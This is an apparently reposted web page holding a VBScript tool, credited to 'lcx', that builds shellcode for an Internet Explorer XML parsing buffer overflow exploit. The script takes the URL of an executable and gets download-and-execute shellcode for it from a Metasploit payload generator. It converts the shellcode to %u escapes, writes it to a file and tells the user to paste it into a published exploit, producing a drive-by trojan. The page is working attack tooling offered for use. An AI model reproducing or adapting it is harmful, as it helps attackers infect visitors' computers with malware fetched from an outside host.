Web Trojan Generator: MS Internet Explorer XML Parsing Buffer Overflow Exploit (vista) 0day
Source: 易賢網 Views: 1496 Date: 2016-07-20 14:06:19

Exploit code for the MS Internet Explorer XML Parsing Buffer Overflow Exploit (vista) 0day

'code by lcx

On Error Resume Next

Exeurl = InputBox( "請輸入exe的地址:", "輸入", "http://www.haiyangtop.net/333.exe" )

url="http://www.metasploit.com:55555/PAYLOADS?parent=GLOB%280x25bfa38%29&MODULE=win32_downloadexec&MODE=GENERATE&OPT_URL="&URLEncoding(Exeurl)&"&MaxSize=&BadChars=0x00+&ENCODER=default&ACTION=Generate+Payload"

Body = getHTTPPage(url)

Set Re = New RegExp

Re.Pattern = "(\$shellcode \=[\s\S]+</div></pre>)"

Set Matches = Re.Execute(Body)

If Matches.Count>0 Then Body = Matches(0).value

code=Trim(Replace(Replace(replace(Replace(Replace(Replace(Replace(Body,"$shellcode =",""),Chr(34),""),Chr(13),""),";",""),"</div></pre>",""),Chr(10),""),".",""))

function replaceregex(str)

set regex=new regExp

regex.pattern="\\x(..)\\x(..)"

regex.IgnoreCase=true

regex.global=true

matches=regex.replace(str,"%u$2$1")

replaceregex=matches

end Function

Function getHTTPPage(Path)

t = GetBody(Path)

getHTTPPage = BytesToBstr(t, "GB2312")

End Function

Function GetBody(url)

On Error Resume Next

Set Retrieval = CreateObject("Microsoft.XMLHTTP")

With Retrieval

.Open "Get", url, False, "", ""

.Send

GetBody = .ResponseBody

End With

Set Retrieval = Nothing

End Function

Function BytesToBstr(Body, Cset)

Dim objstream

Set objstream = CreateObject("adodb.stream")

objstream.Type = 1

objstream.Mode = 3

objstream.Open

objstream.Write Body

objstream.Position = 0

objstream.Type = 2

objstream.Charset = Cset

BytesToBstr = objstream.ReadText

objstream.Close

Set objstream = Nothing

End Function

Function URLEncoding(vstrIn)

strReturn = ""

For aaaa = 1 To Len(vstrIn)

ThisChr = Mid(vStrIn,aaaa,1)

If Abs(Asc(ThisChr)) < &HFF Then

strReturn = strReturn & ThisChr

Else

innerCode = Asc(ThisChr)

If innerCode < 0 Then

innerCode = innerCode + &H10000

End If

Hight8 = (innerCode And &HFF00)\ &HFF

Low8 = innerCode And &HFF

strReturn = strReturn & "%" & Hex(Hight8) & "%" & Hex(Low8)

End If

Next

URLEncoding = strReturn

End Function

set fso=CreateObject("scripting.filesystemobject")

set fileS=fso.opentextfile("a.txt",2,true)

fileS.writeline replaceregex(code)

'fileS.writeline body

wscript.echo replaceregex(code)

files.close

set fso=Nothing

wscript.echo Chr(13)&"ok,生成a.txt,請用a.txt里的替換http://milw0rm.com/sploits/2008-iesploit.tar.gz里的shellcode1內容即可"
